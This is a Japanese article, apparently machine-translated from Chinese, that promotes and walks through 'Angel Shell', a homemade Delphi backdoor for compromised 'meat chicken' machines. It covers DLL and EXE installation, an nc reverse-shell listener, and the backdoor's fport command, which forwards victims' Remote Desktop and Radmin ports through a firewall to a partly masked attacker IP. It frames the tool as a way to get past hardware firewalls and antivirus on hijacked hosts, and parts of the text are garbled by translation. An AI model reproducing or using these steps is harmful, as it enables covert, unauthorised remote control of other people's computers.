Angel Shell:すべての順方向プログラムに逆接続を実現させる(アプリケーション編)


今のサーバーはほとんどハードファイアウォールに置かれていますが、せっかく浸透したのに、ハードファイアウォールが付いていてがっかりしました。端末サービスとか、Radminとかのコントロールは考えないでください。試してみたら、ほぼ逆接続がサポートされています。順方向接続は80と21ポートしか接続できません。1433も接続できません。反対側の裏口に行ってください。アップロードするとウイルス対策ソフトにKillされます。一気にDelphiを持ち出して、自分で後門を書きます!数日の時間を使って、裏口はついに書き上げて、理想的な中の要求をも達成して、効果を使うのはとても悪くなくて、十分にハードウエアのファイアウォールとイントラネットの肉のニワトリの悪夢と称します!独りで享受する勇気がなくて、早く取り出してみんなに共有してみます。   
このプログラムはアンジェラシェルといいます。ここでは私の鶏肉と自分で使うコンピュータを使ってテストをします。まず、逆接続情報を記載するファイルをローカルに配置する必要があります。1行目は自分のIPで、2行目はNCで傍受するポートです。書いたらHTTP空間に置いて、パスワードとFTP空間にアップロードしたHTTPアクセスアドレスを設定します。   
DLLを生成するサーバーまたはEXEのサーバーを選択できます。EXEのサーバーは直接実行すればインストールできます。DLLのサーバーは以下のコマンドでインストールします。 dllパス、I」は最後のIを大文字にしてください。   
ヒント:プログラムの作者は実はみんなのために提供したEXEサーバーです。その本質はDLLプログラムをインストールすることです。   
ここはDLLサービスで模範を示します。まずDLLを愛の肉鶏の上に運び、命令行に打ち込みます。 アンジェラ.dll,I」。ここに注意してください。私はFTPを通じて鶏肉と接続しています。便利さのために直接FTPのコマンドラインでインストールしました。   
装着後、自分のマシンで「nc」を使います。 Cv Cl Cp 7787"は7787ポートを傍受します。つまり私が最初に書いた配置ファイルのポートです。あとでNCがメッセージを送ります。パスワードを入力して車をノックしてください。OKです。接続は成功しました。ヘルプメッセージが表示されると、かわいいシェルが出てきます。   
ヒント:この裏口はまたいくつかの追加命令を提供しています。直接Shellで実行できます。作者は既存のプログラム名との衝突を避けるために、添付命令はすべて小文字です。   
ここまで言えば、この裏口はEXEサービスを作る以外に、特別なものはないと思います。もちろん、これらの機能だけでは私の特徴を作ることができません。ハードファイアウォールの悪夢とも言えません。私たちが今回使ったバックドアは、それ自体が逆接続を実現できるようにするだけでなく、端末サービス、Radmin、MSSQLなど、他のすべての順方向接続が可能なプログラムに逆接続されています。ほほほ、驚かないでください。いい芝居は後ろにあります。みんなをがっかりさせないです。Let's GO!   
Shellの中のFport付加命令を見ましたか?つまりポート転送であり、リモートコンピュータの任意のポートをローカルに逆シミュレーションすることができます。なんですか?分かりませんでしたか?ふふ、大丈夫です。下を見れば分かります。まずWindowsの端末サービスをテストします。このメンドリは以前から端末サービスをされていましたが、ハードファイアウォールのブロックに苦しんでいますので、接続できません。   
豆知識:Fportの使い方:   
fport    
パラメータlocal ポルトとはあなたが肉鶏に転送したいポートのことです。Your IP あなたのIP(またはドメイン名、YourPortはクライアント上で傍受するポートを指します。   
クライアントを開いて、「アナログのポート」に3389を記入し、「リモートコンピュータに接続するポート」に任意で記入してください。もちろん開いているポートと競合しないでください。ここに7788を記入してから、「傍受を開始します。」急いで肉鶏のシェルの下に入ります。 3389 61.187.**** 7788」です。そのうち3389は肉鶏の端末サービスのポートであり、7788はこちらのリモートコンピュータに接続されたポートです。その後、クライアントからリモートコンピュータへの接続を受信したことをヒントとして、この時点でローカルの3389ポートに接続できるようになった。このように私達は肉鶏の3389ポートを自分の愛機に運んできました。   
友達は何を待ちますか?端末サービスの登録器を開けて、IPは現地の127.1.0.1を記入して、接続して、クライアントはすぐにすでにみごとに1つの新しい接続を創立したことを表示すって、そして遠隔のデスクトップの登録のダイアログが現れて、私の心の中のその感動、本当に言語が表現できません!   
私たちはもう二人のユーザを登録してみます。クライアントはまた新しい接続を確立したと表示します。事実の証明、同時に2人のユーザーを登録しても成功しました!もちろん、あなたが望むなら、もっと多くのユーザーを登録してもいいです。私がプログラミングする時に設定した接続ごとに2つのスレッドでデータを転送するので、伝送速度に関しては保証があります。   
喜びに浸っている時、電話が鳴りました。元のMMがカメラを買いました。彼女のために入れてくださいと言いました。これも行きますか?そこで彼女をQQに呼んで、ちょうどもう一度テストしてくれました。このMMはハード級のファイアウォールがありませんが、彼女はイントラネットでWindowsを使っています。 XPプロ版。まずEXEのサービスを彼女に伝えて、彼女に運行させて、現地でモニターします。後でメッセージを受け取ります。そしてパスワードを入力してください。パスワードを入力した後にShellを得て、ファイルを使って機能をダウンロードして彼女にRadminをインストールします。そして以下のコマンドを入力します。 4899 61.187.**** 7788」彼女の4899ポートを私の4899ポートに転送して、現地でRadminを開く。 Viewer、接続IPは127..0.1を書いて、ポートはデフォルトの4899を使って、みごとに接続します!   
彼女に設備の管理器を開けてあげてください。三下五は写真ヘッドのドライバをセットしました。MMはまだそこにいます。どういうことか分かりません。うるさいから、先生になりたいです。汗…テストはここで終わります。心の中のすっきりしたことは言わないでください。   
このプログラムは理論的には任意のプロトコルをサポートしていますが、いくつかのプロトコルの特殊性のため、IPを検証します。例えば、WEBサービスで、今日は鶏肉の80ポートを変えました。自分はウェブサイトを開設したと人を騙したいです。結果は続けざまに上がってきて何を表示しますか? web…in this ……”,この住所はWEBサービスがないという意味です。HTTPプロトコルの中にHostの値が一致しないということを思い出しました。   
最後に、イントラネットで本プログラムを使用する方法について説明します。もし自分がイントラネットにいるなら、正方向に接続されている鶏肉を中継することができます。回転するサーバーのポートをこの中継肉鶏に転送して、直接この中継肉鶏を接続するのは接続サーバに相当します。    
はい、この文章が皆さんに助けてくれることを願っています。友達がここを見てくれて、私も感謝しています。最後に、皆さんがいつまでも楽しく、技術が向上しますように。